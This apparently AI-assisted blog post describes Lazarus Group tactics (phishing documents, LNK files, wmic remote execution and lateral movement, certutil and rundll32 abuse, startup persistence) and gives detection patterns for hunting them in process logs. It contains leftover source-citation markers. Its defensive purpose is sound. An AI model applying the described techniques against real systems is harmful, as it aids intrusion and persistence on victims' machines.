In the ever-evolving world of cybersecurity, understanding and anticipating threats has become a critical necessity. One such threat is the notorious Lazarus Group, known for their sophisticated cyber attack tactics. This blog delves into the specific TTPs (Tactics, Techniques, and Procedures) attributed to the Lazarus Group and potential ways to hunt for these activities in network logs.
The Lazarus Group has been known to leverage various techniques for gaining initial access to systems, such as Phishing via DOCX files and using LNK files within RAR archives. Threat hunters can look for specific anomalies such as subprocesses of winword.exe or winword.exe spawning LOLBAS. Additionally, any browser with a command line parameter containing “.pdf”, or explorer.exe launching cmd.exe with “mkdir” or “copy” in the process command line, may indicate malicious activity【6†source】【7†source】.
Once access is gained, the group often uses scheduled tasks to execute remote payloads via wmic.exe. Hunting for this activity could involve looking for svchost.exe with “Schedule” in the command line spawning any child process with “http” or “https” in the child command line, or taskhostw.exe or taskeng.exe spawning any child process with “http” or “https” in the child command line【8†source】.
Evasion is a key part of the Lazarus Group’s playbook. They’ve been known to use PowerShdll for executing PowerShell via DLL, certutil.exe to decode payloads, and rundll32.exe and regsvr32.exe to execute malware. They’ve also been seen using DOCX files with remote templates and VS Code to launch malicious powershell.exe scripts. This provides a range of hunting opportunities for cybersecurity professionals【9†source】【10†source】【11†source】【12†source】【13†source】.
The Lazarus Group uses wmic.exe for lateral movement, executing code on other machines. Any process command line containing “/node:” and “PROCESS CALL CREATE” can potentially indicate this activity【14†source】.
To maintain persistence, the group puts a LNK file in startup that calls a binary in %TEMP%, disguised as Google Update. There are several potential hunting points here, including all processes with a parent of explorer.exe and grandparent of userinit.exe, explorer.exe spawning a binary located in any folder path containing “Temp” or “Tmp”, or explorer.exe spawning cmd.exe or powershell.exe which spawns another binary located in any folder path containing “Temp” or “Tmp”【15†source】.
While these techniques provide a way to detect the Lazarus Group’s activities, it’s important to note that these are not exhaustive, and a clean sweep of these hunts does not guarantee a secure network. Cybersecurity requires continuous vigilance and adaptation to evolving threats. The Lazarus Group is just one among many, and the techniques they employ today may change tomorrow.